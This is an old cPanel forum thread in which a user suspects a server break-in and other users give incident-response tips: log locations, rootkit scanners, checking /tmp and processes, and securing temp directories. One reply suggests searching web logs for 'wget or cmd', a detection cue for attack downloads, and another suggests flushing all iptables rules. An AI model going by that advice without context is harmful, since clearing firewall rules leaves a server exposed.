The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacker problem!

Discussion in 'General Discussion' started by KillaH425, Oct 4, 2006.

  1. KillaH425

    KillaH425 Registered

    Joined:
    Oct 4, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    I am fairly sure that someone has hacked into our server either by exploit or by guessing our password. I want to find the logs of the FTP access, but I can't get them thru cPanel. I downloaded the main file and it brings up a command prompt and then in the FTP Manager section I can't access the links at the bottom because they don't exist. Any suggestions?!
     
  2. designeru

    designeru Well-Known Member

    Joined:
    Nov 2, 2005
    Messages:
    83
    Likes Received:
    0
    Trophy Points:
    6
    Hint!

    Try logging in to your console (ssh), go to /var/logs and search there:

    - xferlog - ftp log
    - /usr/local/apache/domlogs/ - search for wget or cmd
    - last - the last logins to your server

    Don't forget to run rkhunter and chkrootkit.
    Also, do a:
    # ps -auxf | grep nobody
    ... to see if there are any started processes.

    Go to /tmp and search for any suspicious files.

    If "the one" who broke your server and wasn't stupind enough you won't find a thing.
     
  3. KillaH425

    KillaH425 Registered

    Joined:
    Oct 4, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    How do you login using SSH? And by the way, cPanel is installed on a local server and not WHM, in case that changes anything. I can still access the console, but I know someone banned IPs and screwed something up because now nothing works. Thanks.
     
  4. designeru

    designeru Well-Known Member

    Joined:
    Nov 2, 2005
    Messages:
    83
    Likes Received:
    0
    Trophy Points:
    6
    Advice...

    > How do you login using SSH?
    google.com -> putty ssh

    This is a small tool that will let you connect to your unix based server from any windows computer.

    > I can still access the console, but I know someone banned IPs and screwed something up because now nothing works.

    You mean you have direct access to that server? Do
    # iptables -F && iptables -F -t nat && iptables -F -t mangle
    ... if you don't have direct access to the server, ask your seller to do that. You will need ROOT ACCESS to do that, then login from windows pc via ssh.
     
  5. KillaH425

    KillaH425 Registered

    Joined:
    Oct 4, 2006
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    I am pretty positive this route would take weeks as it isn't hosted by a company. Instead it is hosted by someone that is hard to contact. I was hoping for an easier method.
     
  6. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    If you are hosting your web site, you'll have to contact your host for help. If you have a dedicated server and need help, contact your Data Center, or seek professional help.
     
  7. Danny_T

    Danny_T Well-Known Member

    Joined:
    Jul 19, 2005
    Messages:
    181
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Netherlands
    the /scripts/securetmp script will fix a lot hack attempts, at least the cant run executables'ou t the tmp dirs. There are always on a webhosting system a lot php applications that are leak. Much webmasters don't update their PHP application in time or not at all.
    Now i see a lot weird executeables in my tmp dirs but they are not started anymore :) that saved a lot trouble hehe

    I only miss the secure of the shm device in that script (box is FC).

    Danny.
     
Loading...

Share This Page